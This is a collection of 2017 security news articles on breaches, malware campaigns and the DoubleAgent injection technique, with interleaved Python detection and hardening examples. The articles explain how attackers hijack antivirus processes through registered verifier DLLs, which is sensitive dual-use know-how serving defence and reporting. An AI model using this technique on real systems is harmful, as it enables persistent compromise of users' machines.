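The command allowlist is the check that matters most: an origin check alone would still let a script running inside a trusted page (for example through an XSS there) request a privileged RPC, whereas the allowlist keeps password-handling commands unreachable from any web content at all.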


Once again Three mobile customers in UK experienced data breach
22.3.2017 securityaffairs Incident

UK Three mobile customers experienced a new data breach, this time a technical issue caused the exposure of their personal details.
It has happened again, customers of the company Three UK experienced a new data breach.
Some customers logging into their accounts were able to view personal data (names, addresses, phone numbers) and call histories of other users.

The company promptly started an internal investigation and urged those affected to contact customer service; it also confirmed that no financial data was exposed.

The Guardian confirmed that several customers were affected, reporting that several users were presented with the data usage and call and text history of others when they logged in on Sunday night.

One customer cited by The Guardian, Mark Thompson, said it was a “shocking breach of data privacy”. He wrote on Three UK’s Facebook page: “Care to explain just how my details have been shared, how many people have had access to my personal information, for how long, and how many of your other customers have had their details leaked by yourselves to other members of the public as well?”


Three UK has 9 million customers in the UK, but according to the company only a small portion of them was affected by the issue.

“We are aware of a small number of customers who may have been able to view the mobile account details of other Three users using My3,” a spokesman said. “No financial details were viewable during this time and we are investigating the matter.”

The Information Commissioner’s Office announced it “will be looking into this potential incident involving Three”.

“Data protection law requires organisations to keep any personal information they hold secure. It’s our job to act on behalf of consumers to see whether that’s happened and take appropriate action if it has not.” said a spokeswoman from the ICO.

It isn’t the first time Three UK has made the headlines: in November 2016 the mobile carrier confirmed a major cyber security breach which exposed the personal data of a portion of its customers, roughly 133,000 users.

Authorities arrested three men for this crime.


Unpatchable 'DoubleAgent' Attack Can Hijack All Windows Versions — Even Your Antivirus!
22.3.2017 thehackernews Vulnerebility

A team of security researchers from Cybellum, an Israeli zero-day prevention firm, has discovered a new Windows vulnerability that could allow hackers to take full control of your computer.
Dubbed DoubleAgent, the new code injection technique works on all versions of Microsoft Windows operating systems, from Windows XP to the latest release of Windows 10.
What's worse? DoubleAgent exploits a 15-year-old undocumented legitimate feature of Windows called "Application Verifier," which cannot be patched.
Application Verifier is a runtime verification tool that loads DLLs (dynamic link libraries) into processes for testing purposes, allowing developers to quickly detect and fix programming errors in their applications.
Unpatchable Microsoft Application Verifier Exploit
The vulnerability resides in how this Application Verifier tool handles DLLs. According to the researchers, as part of the process, DLLs are bound to the target processes in a Windows Registry entry, but attackers can replace the real DLL with a malicious one.
Simply by creating a Windows Registry key with the same name as the application they want to hijack, an attacker can provide a custom verifier DLL to be injected into a legitimate process of any application.
Once the custom DLL has been injected, the attacker can take full control of the system and perform malicious actions, such as installing backdoors and persistent malware, hijacking the permissions of any existing trusted process, or even hijacking other users’ sessions.
Here's how the Cybellum researchers say this attack can work:
"DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victim’s process boot, giving the attacker full control over the process and no way for the process to protect itself."
Using DoubleAgent Attack to Take Full Control of Anti-Virus

In order to demonstrate the DoubleAgent attack, the team used their technique to hijack anti-virus applications, which are a system's main defense against malware running on it, and turned them into malware.
The team was able to corrupt the anti-virus app using the DoubleAgent attack and get the security software to act as disk-encrypting ransomware.
The attack works on every version of Windows from Windows XP to Windows 10 and is hard to block because the malicious code can be re-injected into the targeted legitimate process after the system reboots, thanks to the persistent registry key.
The researchers said most of today's security products on the market are susceptible to the DoubleAgent attack. Here's the list of affected security products:
Avast (CVE-2017-5567)
AVG (CVE-2017-5566)
Avira (CVE-2017-6417)
Bitdefender (CVE-2017-6186)
Trend Micro (CVE-2017-5565)
Comodo
ESET
F-Secure
Kaspersky
Malwarebytes
McAfee
Panda
Quick Heal
Norton
After hijacking the anti-virus software, attackers can also use the DoubleAgent attack to disable the security product, making it blind to malware and cyber attacks; use the security product as a proxy to launch attacks on the local computer or network; elevate the privilege level of all malicious code; hide malicious traffic or exfiltrate data; or damage the OS or cause a denial of service.
Note: Cybellum researchers only focused on anti-virus programs, though the DoubleAgent attack could work with any application, even Windows operating system itself.
Many Antiviruses Still Unpatched Even After 90 Days Of Responsible Disclosure
Cybellum said the company had reported the DoubleAgent attack to all affected anti-virus vendors more than 90 days ago.
Cybellum researchers have been working with some anti-virus companies to patch the issue, but so far only Malwarebytes and AVG have released a patch, and Trend Micro has said it will release one soon.
So, if you use any of the three apps mentioned above, you are strongly advised to update it as soon as possible.
As a mitigation, the researchers note that the simplest fix for antivirus vendors is to move from Application Verifier to the newer Protected Processes architecture.
Protected processes (introduced by Microsoft in Windows 8.1 specifically for anti-malware services) prevent other applications from injecting unsigned code into the protected process, but according to the researchers this mechanism has so far been implemented only in Windows Defender.
Cybellum has also provided a video demonstration of the DoubleAgent attack, showing how they turned an antivirus app into a ransomware that encrypts files until you pay up.
The company also posted proof-of-concept (PoC) code on GitHub, and two blog posts detailing the DoubleAgent attack.


Malvertising Campaign Targets Adult Websites to Distribute Ramnit Worm

21.3.2017 securityaffairs Virus

A new malvertising campaign has been discovered using popular adult websites (each with several million visits per month) to target primarily Canadian and UK visitors. Using pop-under ads, victims were ultimately directed to the RIG exploit kit which sought to drop Ramnit.

Malwarebytes lead malware intelligence analyst Jerome Segura reports that a campaign using the ExoClick ad network sought to infect victims with the Ramnit information-stealing worm.

An earlier Ramnit botnet was dismantled in a joint operation involving security firms and European police agencies in February 2015; but the malware returned before the end of the year. This was followed by a quiet period until a new version, possibly with a new master, emerged in the summer of 2016.

Pop-under ads are triggered when a user clicks on an item on the site they are visiting. Doing so in this instance launched a pop-under window behind the main page. Redirection from here loaded mostly benign adult portals and offers -- but a 302 redirect also went to a malicious site that performed geolocation fingerprinting before loading the RIG exploit kit.
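The chain Segura describes (page, pop-under, ad-network 302, geolocation check, RIG landing page) is visible in a web proxy log, and reconstructing it is a reasonable first detection. The script below is an added example, not Malwarebytes' tooling: it assumes a proxy that logs the Location header of redirect responses alongside the Referer (without Location, 302 hops are invisible, because browsers carry the original Referer across redirects), and it flags chains that contain an ad-network redirect and end on a domain the proxy has never seen. The log lines, the ad-network hostnames and the "known domains" baseline are all constructed for the example.

```python
"""Added example: rebuild pop-under -> redirect -> landing-page chains from a
proxy log and flag chains that leave the ad network for a never-seen domain."""
from collections import defaultdict
from urllib.parse import urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# Assumed: hostnames of the ad network that served the pop-unders. The article
# names ExoClick as the abused network but no hostnames; these are illustrative.
AD_NETWORK_DOMAINS = {"ads.example-adnet.net", "syndication.example-adnet.net"}

# Assumed baseline: domains this proxy had already seen before the day in question.
KNOWN_DOMAINS = AD_NETWORK_DOMAINS | {"www.adultsite.example", "offers.example-adnet.net"}

# Constructed proxy log, one request per line:
#   <epoch> <client> <status> <url> <referer|-> <location|->
SAMPLE_LOG = """\
1490083200 10.0.0.7 200 http://www.adultsite.example/videos/123 - -
1490083201 10.0.0.7 200 http://ads.example-adnet.net/popunder?z=77 http://www.adultsite.example/videos/123 -
1490083201 10.0.0.7 302 http://syndication.example-adnet.net/click?id=a1 http://ads.example-adnet.net/popunder?z=77 http://offers.example-adnet.net/dating
1490083202 10.0.0.7 200 http://offers.example-adnet.net/dating http://ads.example-adnet.net/popunder?z=77 -
1490083203 10.0.0.7 302 http://syndication.example-adnet.net/click?id=b2 http://ads.example-adnet.net/popunder?z=77 http://geo-check.example-bad.top/?cc=CA
1490083203 10.0.0.7 200 http://geo-check.example-bad.top/?cc=CA http://ads.example-adnet.net/popunder?z=77 -
1490083204 10.0.0.7 200 http://lp.example-bad.top/?q=1 http://geo-check.example-bad.top/?cc=CA -
1490083210 10.0.0.9 200 http://www.adultsite.example/ - -
"""


def host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def parse_log(text: str) -> list:
    reqs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, status, url, referer, location = line.split()
        reqs.append({"ts": int(ts), "client": client, "status": int(status), "url": url,
                     "referer": None if referer == "-" else referer,
                     "location": None if location == "-" else location})
    return reqs


def redirect_chains(reqs: list) -> list:
    """Every path that starts at a pop-under (ad-network URL reached from a non-ad
    page). After a redirect the next hop is the request for its Location; after a
    normal page the next hops are requests citing it as Referer, minus those that
    were really reached through a redirect (browsers keep the Referer across 302s)."""
    by_url, by_referer, redirect_targets = defaultdict(list), defaultdict(list), set()
    for r in reqs:
        by_url[(r["client"], r["url"])].append(r)
        if r["referer"]:
            by_referer[(r["client"], r["referer"])].append(r)
        if r["location"]:
            redirect_targets.add((r["client"], r["location"]))

    def next_hops(x):
        if x["location"]:
            cand = by_url.get((x["client"], x["location"]), [])
        else:
            cand = [r for r in by_referer.get((x["client"], x["url"]), [])
                    if (r["client"], r["url"]) not in redirect_targets]
        return [r for r in cand if r["ts"] >= x["ts"]]

    chains = []

    def walk(path):
        nxt = [n for n in next_hops(path[-1]) if all(n is not p for p in path)]  # loop guard
        if not nxt:
            chains.append(path)
        for n in nxt:
            walk(path + [n])

    for r in reqs:
        if (host(r["url"]) in AD_NETWORK_DOMAINS and r["referer"]
                and host(r["referer"]) not in AD_NETWORK_DOMAINS):
            walk([r])
    return chains


def flag_malvertising(text: str) -> list:
    """(client, hop hostnames) for chains with an ad-network redirect that end
    on a domain outside the known baseline."""
    flagged = []
    for chain in redirect_chains(parse_log(text)):
        hops = [host(r["url"]) for r in chain]
        ad_redirect = any(r["status"] in REDIRECT_STATUSES and host(r["url"]) in AD_NETWORK_DOMAINS
                          for r in chain)
        if ad_redirect and hops[-1] not in KNOWN_DOMAINS:
            flagged.append((chain[0]["client"], hops))
    return flagged


if __name__ == "__main__":
    for client, hops in flag_malvertising(SAMPLE_LOG):
        print(client, " -> ".join(hops))
```

The "never seen before" test is what separates the two pop-under chains: both pass through the same ad-network click redirector, but only one exits onto a domain absent from the baseline. In production the baseline is the proxy's own domain history, and the geolocation-check hop is a useful pivot: any other client that fetched the same URL was served the same campaign.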

The danger with malvertising is that it is invisible to the eye and effective from trusted sites. One method of mitigating this threat is to use an ad blocker which prevents all third-party ads, both benign and malicious, from being loaded. Publishers, however, are increasingly detecting such software and not allowing visitors to see the content. This is, strictly speaking, illegal within the European Union, but still happens.

A second defense is to rely on an up-to-date mainstream anti-virus product and hope that it detects the malvertising payload. Segura recommends both. "Ad-blockers are quite effective as a first line of defense to stop malvertising in general," he told SecurityWeek, "while security products will mitigate exploits and malware payload. One solution should not replace the other and they actually complement each other nicely."

Ramnit has evolved into effective banking fraud malware. The geolocation used in this campaign seeks to target Canada and the UK -- two areas that have been repeatedly targeted by Ramnit. "The creators of the Ramnit Trojan (or any banking Trojan for that matter)," explains Segura, "need to have an understanding of each country's financial institutions in order to develop the appropriate tools (webinjects) to capture user information who do online banking. The choice could be motivated simply by the return on investment, likelihood of being detected but also general availability of money mules to transfer funds." Canadian and UK banks are clearly well-understood by the criminals behind the malware.

In this campaign (which has now been blocked by ExoClick), the prime target is individual adults. It would be wrong, however, to assume that malvertising is primarily a consumer threat. Relaxed attitudes to staff using their own devices at work and using the internet to keep up with news makes everyone susceptible.

"Malvertising isn't just a consumer threat in the sense that any user today is exposed to rogue online adverts, whether it is at home or at work," warns Segura. "Online crooks abuse ad networks to insert malicious redirections into their creative effectively making malvertising a precise and targeted delivery mechanism for malware. Therefore, consumers may be served a different payload than businesses while the distribution via malicious ads remains the same."


Non-Targeted Malware Hits 3,000 Industrial Sites a Year: Study

21.3.2017 securityweek Virus

Thousands of industrial facilities have their systems infected with common malware every year, and the number of attacks targeting ICS is higher than it appears, according to a study conducted by industrial cybersecurity firm Dragos.

There have been an increasing number of media reports on malware infections affecting critical infrastructure and other industrial facilities, and while attention from the press can have some benefits, most experts agree that overhyped media reporting is likely to have a negative impact on ICS security.

Existing public information on ICS attacks shows numbers that are either very high (e.g. over 500,000 attacks according to unspecified reports cited by Dragos), or very low (e.g. roughly 290 incidents per year reported by ICS-CERT). Dragos has set out to provide more realistic numbers on malware infections in ICS, based on information available from public sources such as VirusTotal, Google and DNS data.

As part of a project it calls MIMICS (malware in modern ICS), Dragos has identified roughly 30,000 samples of malicious ICS files and installers dating back to 2003. Non-targeted infections involving viruses such as Sivis, Ramnit and Virut are the most common, followed by Trojans that can provide threat actors access to Internet-facing environments.

The company’s analysis showed that approximately 3,000 unique industrial sites are hit by traditional, non-targeted malware every year. The actual number of affected organizations is likely higher, but Dragos believes this can be a useful base metric for the community.

These incidents may not be as severe as targeted attacks and they are unlikely to cause physical damage or pose a safety risk. However, they can cause liability issues and downtime to operations, which leads to increased financial costs, Robert M. Lee, CEO and founder of Dragos, told SecurityWeek.

One example provided by the expert is the incident involving a German nuclear energy plant in Gundremmingen, whose systems got infected with Conficker and Ramnit malware. The malware did not cause any damage and it was likely picked up by accident, but the incident did trigger a shutdown of the plant as a precaution.


Dragos’ research has also shown that targeted ICS intrusions are not as rare as they appear. While Stuxnet, Havex and BlackEnergy are the only pieces of malware known to specifically target ICS, the security firm has identified a dozen intrusions involving ICS-themed malware.

These types of threats, disguised as legitimate ICS software, target operators and engineers. Dragos believes ICS-themed malware can be highly efficient in evading security products as many vendors simply don’t know how to tell apart legitimate from rogue ICS software.

One ICS-themed piece of malware that attracted the researchers’ attention was disguised as software for Siemens programmable logic controllers (PLCs). The threat, which Dragos describes as crimeware, was submitted to public malware databases ten times between 2013 and March 2017. Antivirus engines initially treated the samples as false positives and only later classified them as a basic piece of malware.

“In short, there has been an active infection for the last 4 years of an adversary attempting to compromise industrial environments by theming their malware to look like Siemens control software,” Lee said in a blog post.

Dragos has not linked the Siemens-themed malware to a specific threat actor, Lee told SecurityWeek.

Another noteworthy finding of the MIMICS project is related to operational security (OPSEC). Researchers discovered that public malware databases often contain legitimate ICS software components that have been erroneously flagged as malicious. Experts identified various such components, including human-machine interface (HMI) and data historian installers, and key generators.

“This means that adversaries can simply download these software files and leverage access to them for their own learning and practicing,” Lee explained. “Keeping our legitimate software out of the hands of the adversaries helps lengthen the time it takes them to target our environments.”

Dragos has identified more than 120 project files in the public databases it has analyzed, including maintenance reports, Nuclear Regulatory Commission (NRC) reports, and substation layouts.

“There are a few lessons here: have a discussion with the IT security teams (outsourced or on-site) on what is legitimate and what should not be submitted to the internet, validate what your security technologies are submitting to databases such as VirusTotal [...], and be proactive in looking at such databases for your own files and information,” Lee said.


Metasploit's New RFTransceiver Finds Security Flaws in IoT Radio Communications

21.3.2017 securityweek Vulnerability
The Internet of Things is pervasive, rapidly growing, and largely insecure. Researchers have discovered security flaws in products ranging from baby alarms and dolls, to motor vehicles and medical equipment -- and the likelihood is that there are many more simply not yet discovered.

Metasploit has now released a new hardware bridge extension to help researchers and pentesters -- and IoT user organizations -- discover security flaws in IoT radio communications. While many of the known flaws are found in consumer devices, IoT devices are increasingly making their way into and onto business premises; and it is very difficult for security teams to control them.

"Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas," writes Craig Smith, Transportation Research Lead at Rapid7 in a blog announcement today. These same devices can often contain flaws that can be used by attackers, but are unknown to the user.

With Metasploit's new RFTransceiver radio frequency testing extension, companies will be able to better understand their true security posture. They will, suggests Smith, "be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises."

In October 2016, Rapid7 reported a vulnerability in a medical insulin pump. The pump was remotely controlled, but communication was sent between the controller and the device in cleartext rather than encrypted. This could allow a hacker to spoof the controller and trigger unauthorized insulin injections. The problem for security teams is that there is no easy way to know what communication happens between a device and its control server.
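The insulin-pump finding above is a protocol-design failure rather than a radio failure: nothing in a cleartext frame ties it to the paired controller, so anyone who can transmit on the frequency is the controller. As an added example (not Rapid7's code, and not the real pump's protocol, which the article does not describe), here is the minimum an authenticated command link needs, modelled in Python: a monotonic counter and a truncated HMAC under a pairing key. The frame layout, the key, and the command encoding are assumptions and are marked as such in the code.

```python
"""Added example: a cleartext RF command link beside an authenticated one.
Frame layout, key and command bytes are assumed for illustration only."""
import hashlib
import hmac
import struct

# Assumed: a per-device key provisioned at pairing time and never sent over the air.
PAIRING_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
TAG_LEN = 8  # truncated HMAC-SHA256 tag; 64 bits keeps airtime low on a constrained link


def build_frame(key: bytes, counter: int, command: bytes) -> bytes:
    """Controller side: counter || command || HMAC(key, counter || command)[:TAG_LEN]."""
    body = struct.pack(">I", counter) + command
    return body + hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]


class CleartextPump:
    """Models the reported flaw: whatever arrives on the radio is executed."""

    def __init__(self):
        self.executed = []

    def accept(self, frame: bytes) -> bool:
        self.executed.append(frame)
        return True


class AuthenticatedPump:
    """Executes a frame only if the tag verifies under the pairing key and the
    counter is higher than the last accepted one (rejects spoofing and replay)."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_counter = -1
        self.executed = []

    def accept(self, frame: bytes) -> bool:
        if len(frame) < 4 + TAG_LEN:
            return False
        body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):  # forged or corrupted frame
            return False
        counter = struct.unpack(">I", body[:4])[0]
        if counter <= self.last_counter:  # replay of a captured frame
            return False
        self.last_counter = counter
        self.executed.append(body[4:])
        return True


def demo() -> dict:
    """Plays the article's scenario (spoofed controller) against both pump models."""
    bolus = b"BOLUS:2.0"  # assumed command encoding
    legit = build_frame(PAIRING_KEY, counter=1, command=bolus)
    # The attacker can transmit anything, but does not hold the pairing key.
    spoofed = build_frame(b"attacker-has-no-key", counter=2, command=b"BOLUS:25.0")
    weak, strong = CleartextPump(), AuthenticatedPump(PAIRING_KEY)
    return {
        "cleartext_accepts_spoof": weak.accept(b"BOLUS:25.0"),
        "auth_accepts_legit": strong.accept(legit),
        "auth_rejects_replay": not strong.accept(legit),
        "auth_rejects_spoof": not strong.accept(spoofed),
        "auth_executed": strong.executed,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Note what this does and does not buy: the tag gives authenticity and the counter gives replay protection, which is what stops the spoofing attack; it does not hide the command (add encryption if the traffic itself is sensitive). The strictly increasing counter also tolerates lost frames, since any later counter is still accepted, but a controller that loses its counter state needs a resynchronisation step, and the pairing-key distribution is the part that most real devices get wrong.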

"We strongly believe," writes Smith, "that RF testing is an incredibly important -- though currently often overlooked -- component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands."

His "often overlooked" comment is valid and serious. Freelance security consultant and researcher Robin Wood (aka DigiNinja pentester) told SecurityWeek, "Being able to easily test RF that isn't the standard 802.11 wifi is going to be really useful for physical tests where clients are really switched on and want to know exactly what is going on in their environments.

"Unfortunately, at the moment I find this type of client is few and far between but, as the technology to do the testing gets cheaper and easier to use, hopefully more testers will start using it and offering it as a service which will then start drawing more clients in; in turn increasing the exposure of RF based devices and so creating a feedback loop."

Wood believes that the Metasploit capability will "make it easier for people to do research in this area which again will start to increase awareness and hopefully the overall security."

The danger, of course, is that criminal elements could also use Metasploit to find flaws suitable for exploiting. It is a criticism that has always been leveled against Metasploit, and one that Smith mentions. "The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things." But he adds that the bad guys are already doing bad things, and the best defense is to know what they can do. "Sunlight is the best disinfectant," he adds.

F-Secure is at least one security firm that agrees. "RF has traditionally been a fruitful attack vector," a spokesperson told SecurityWeek, "so maybe the availability of more tools in the field will improve that situation. When a widely-used tool like Metasploit starts offering a module that allows this sort of work, it lowers the entry barrier considerably. We may see more device manufacturers starting to pay attention to the RF attack vectors against their devices, but we are also almost certain to see more attacks from this angle as well."

At the same time, F-Secure is aware of the dangers. "This sort of technology is very much 'dual use' in the sense that while it is essential to security researchers and red teams, it can also be used as an attack tool by malicious parties."

Senior security consultant Taneli Kaivola added, "Now that the door has been opened for the wider public, we can expect to see the scope and capability of this tool expanding. I fully expect to see SDRs (software defined radios, adding additional frequencies) supported in the framework popping up like mushrooms in the rain."

Chester Wisniewski, principal research scientist at Sophos, told SecurityWeek that he primarily sees the dangerous side. "Rapid7 is correct that RF testing can be a critical component in many areas of security research, but it is very different from traditional pentesting tools. To me this is a concerning development. Take average hacker-types with no knowledge of RF and the regulatory frameworks designed to allow our devices to work and provide them a tool that can send and receive signals with almost no knowledge.

"What could possibly go wrong?" he asks. "Other than breaking just about anything that operates over RF in a difficult to detect manner... I just don't think making it a toolkit anyone can use is a good idea. Software-defined radios have already breached this wall, but I suspect simplifying their use will end in tears."


Attackers Can Hijack Security Products via Microsoft Tool

21.3.2017 securityweek Hacking
Researchers at Cybellum, an Israel-based company that specializes in zero-day prevention, have identified a new technique that can be used by attackers to take full control of security products.

The attack, dubbed by the security firm “DoubleAgent,” allegedly affects the products of several vendors, including Avast, AVG, Avira, Bitdefender, Trend Micro, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Panda, Quick Heal and Symantec (Norton). However, the company says only a few of the impacted vendors have released patches.

The attack involves the Microsoft Application Verifier, a runtime verification tool for unmanaged code that helps developers quickly find subtle programming errors in their applications. The tool, introduced with Windows XP, is installed by default and enabled on all versions of the operating system.

The tool works by loading a so-called “verifier provider DLL” into the targeted application’s process for runtime testing. Once it’s created, the DLL is added to the Windows Registry as a provider DLL for a specified process. Windows then automatically injects the DLL into all processes with the registered name.

According to Cybellum, this allows a piece of malware executed by a privileged user to register a malicious DLL for a process associated with an antivirus or other endpoint security product, and hijack its agent. Some security products attempt to protect the registry keys associated with their processes, but researchers have found a way to easily bypass this protection.

Once the malware hijacks a security product, it can abuse it for various tasks, including to get it to perform malicious operations on the attacker’s behalf, change whitelists/blacklists and internal logic, install backdoors, exfiltrate data, spread the malware to other machines, and encrypt or delete files (i.e. ransomware).

The security firm pointed out that the attack is difficult to block since the malicious code is injected into the process even after a reboot of the system, a software update, or reinstallation of the targeted product.

The DoubleAgent attack is said to work on all versions of Windows, including Windows 10, and any architecture. However, since the method relies on a legitimate tool, there is nothing Microsoft can do about it.

Slava Bronfman, co-founder and CEO of Cybellum, told SecurityWeek that DoubleAgent is ideal in the post-breach phase of an attack. “It's the missing part for every malware to become an advanced persistent threat (APT),” he said.

Cybellum will soon publish a blog post containing additional technical details and proof-of-concept (PoC) code. It has also made available a video showing how the attack works against a Norton product:

Cybellum says it has informed all affected antivirus vendors, but so far only Malwarebytes and AVG have released patches, and Trend Micro has promised to address the issue next week. The company decided to make its findings public after giving vendors more than 90 days to ensure that their products are protected against potential attacks.

“The responsible thing to do now is to publish [the research], since attackers are examining other vendors’ patches and might use this attack,” Bronfman explained.

In addition to patching the vulnerability, Cybellum says such attacks can be prevented by antivirus vendors via protected processes, a concept introduced by Microsoft in Windows 8.1 for protecting anti-malware services against attacks. The Israeli company says the protection has so far only been implemented in Windows Defender.
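Both DoubleAgent write-ups above describe the persistence as a verifier provider DLL registered in the registry for the target process. Concretely (not spelled out in either article, but this is how Application Verifier registers providers), that is the Image File Execution Options key for the image name, with the GlobalFlag value carrying the 0x100 (FLG_APPLICATION_VERIFIER) bit and VerifierDlls naming the provider DLLs. The script below is an added example, not Cybellum's PoC: it parses a `reg export` of that key taken from a suspect machine and flags every image whose provider list contains a DLL outside an assumed allowlist of Application Verifier's own providers. The sample export, the `avscanner.exe` image name and the DLL names are constructed.

```python
"""Added example: offline triage of an exported Image File Execution Options
(IFEO) key for DoubleAgent-style Application Verifier persistence."""
import re

FLG_APPLICATION_VERIFIER = 0x100  # GlobalFlag bit that makes the loader consult VerifierDlls

# Assumed allowlist: provider DLLs shipped with Microsoft Application Verifier
# itself. Not from the articles; tune it to what is actually installed on your build.
KNOWN_VERIFIER_DLLS = {"vrfcore.dll", "vfbasics.dll", "vfcompat.dll", "vfnet.dll", "vfprint.dll"}

# Constructed sample of:
#   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
# avscanner.exe, update_helper.dll and stale.dll are made-up names.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="vrfcore.dll vfbasics.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscanner.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="update_helper.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"VerifierDlls"="stale.dll"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')
STR_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_export(text: str) -> dict:
    """Minimal .reg parser: {key path: {value name: int | str}} for REG_DWORD and REG_SZ."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        if current is None:
            continue
        m = DWORD_RE.match(line)
        if m:
            keys[current][m.group(1)] = int(m.group(2), 16)
            continue
        m = STR_RE.match(line)
        if m:
            keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")  # .reg doubles backslashes
    return keys


def find_verifier_hijacks(text: str) -> list:
    """(image name, suspicious DLLs, verdict) for every IFEO subkey whose
    VerifierDlls contains a DLL outside the allowlist."""
    findings = []
    for key, values in parse_reg_export(text).items():
        image = key.rsplit("\\", 1)[-1]
        dlls = str(values.get("VerifierDlls", "")).split()  # REG_SZ, space-separated
        if not dlls:
            continue  # the parent key and images with no provider registered
        armed = (int(values.get("GlobalFlag", 0)) & FLG_APPLICATION_VERIFIER) != 0
        unknown = [d for d in dlls if d.lower() not in KNOWN_VERIFIER_DLLS]
        if armed and unknown:
            findings.append((image, " ".join(unknown),
                             "armed: FLG_APPLICATION_VERIFIER set and unknown provider DLL"))
        elif unknown:
            findings.append((image, " ".join(unknown),
                             "dormant: unknown provider DLL registered, verifier flag not set"))
    return findings


if __name__ == "__main__":
    for image, dlls, verdict in find_verifier_hijacks(SAMPLE_REG_EXPORT):
        print(f"{image}: {dlls} ({verdict})")
```

Run it against exports of both the native key and the Wow6432Node copy. A workstation on which nobody ever ran Application Verifier should have no VerifierDlls entries at all, so even the "dormant" case deserves a look. Because this key is what survives reboots and product reinstalls, the remediation is to delete the value and the DLL it names; reinstalling the security product does not help.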


Twitter Suspends More Accounts Linked to 'Terrorism'

21.3.2017 securityweek Social
Twitter said Tuesday it suspended 376,890 accounts in the second half of 2016 for "promotion of terrorism," an increase of 60 percent over the prior six-month period.

The latest suspensions bring the total number of blocked accounts to 636,248 from August 2015, when Twitter stepped up efforts to curb "violent extremism," the company announced as part of its latest transparency report.

The actions come with social networks under pressure from governments around the world to use technology tools to lock out jihadists and others who use the platforms to recruit and launch attacks.

Twitter said separately the number of government requests for user data rose seven percent from the prior six-month period, but affected 13 percent fewer accounts.

For requests to remove content -- from governments and others including copyright holders -- the number of requests was up 13 percent but the number of accounts fell 37 percent.

Twitter announced that the FBI had informed the social network it was no longer under a "gag order" that prevented the disclosure of five cases involving "national security letters" -- special requests from the US law enforcement agency in national security cases.

As a result, Twitter was able to inform the affected users of the FBI requests.

"As we continue to push for more transparency in how we can speak about national security requests, we will update this new section in future transparency reports," Twitter stated.

Twitter, which is pressured by certain governments to remove "hate speech," disclosed for the first time a partnership with a third-party research group called Lumen to catalog any information removed.

Twitter said it began the agreement with Lumen in 2010.

"Unless we are prevented from doing so, when we withhold content in a certain country Twitter will continue to provide a copy of the request to Lumen so anyone can see what type of content was removed and who made the request," the company said.

Another section of the transparency report was devoted to "legal removals," or requests to remove content from verified journalists and other media outlets.

"Given the concerning global trend of various governments cracking down on press freedom, we want to shine a brighter light on these requests," Twitter said.

It received 88 legal requests from around the world to remove content posted by verified journalists or news outlets, but did not take any action on the majority of the requests, "with limited exceptions in Germany and Turkey," which accounted for 88 percent of such requests.

"For example, we were compelled to withhold tweets sharing graphic imagery following terror attacks in Turkey in response to a court order," Twitter said.


"Swearing Trojan" Tactics Could Become Global Threat: Researchers

21.3.2017 securityweek Virus
Check Point security researchers have warned that tactics employed by a mobile Trojan targeting users in China might become a worldwide threat when adopted by Western malware.

Called the "Swearing Trojan", the threat was discovered not long ago by Tencent Security researchers, who revealed that the threat can steal bank credentials and other sensitive personal information from Android devices. The malware’s name comes from Chinese swear words that were found inside the malware’s code.

The Swearing Trojan can also bypass two-factor authentication (2FA) by replacing the original SMS app on infected devices with an altered version, which lets it intercept the one-time codes banks send to their users.

The malware was observed spreading through droppers that download malicious payloads on compromised devices, and via fake base transceiver stations (BTSs) that send phishing SMS messages purportedly coming from China Mobile and China Unicom, two of the largest Chinese telecom service providers. Similar tactics could be adopted by Western malware too, researchers say.

“Using a BTS to send fake messages is quite sophisticated, and the SMS content is very deceptive. The message tricks users into clicking a malicious URL which installs malware. Fake messages from people victims may be romantically involved with have also been seen in these attacks,” Check Point reveals.

Once the malware has infected a device, it starts sending automated phishing SMSs to the victims’ contacts. SMS messages spreading Swearing Trojan might also attempt to trick the victim into downloading a work related document, a picture of a memorable event or that of a cheating spouse, a video of a trending event, or even critical updates. The malware itself uses SMS or email to communicate with the command and control server.

As it turns out, the actors using this Trojan have already been arrested, but Check Point says the malware has remained active, likely because the attackers were part of a larger operation. What’s more, the researchers say that only 21cn.com email addresses were used in the initial campaign, while new attacks also used other popular Chinese email providers, including 163.com, sina.cn and qq.com.

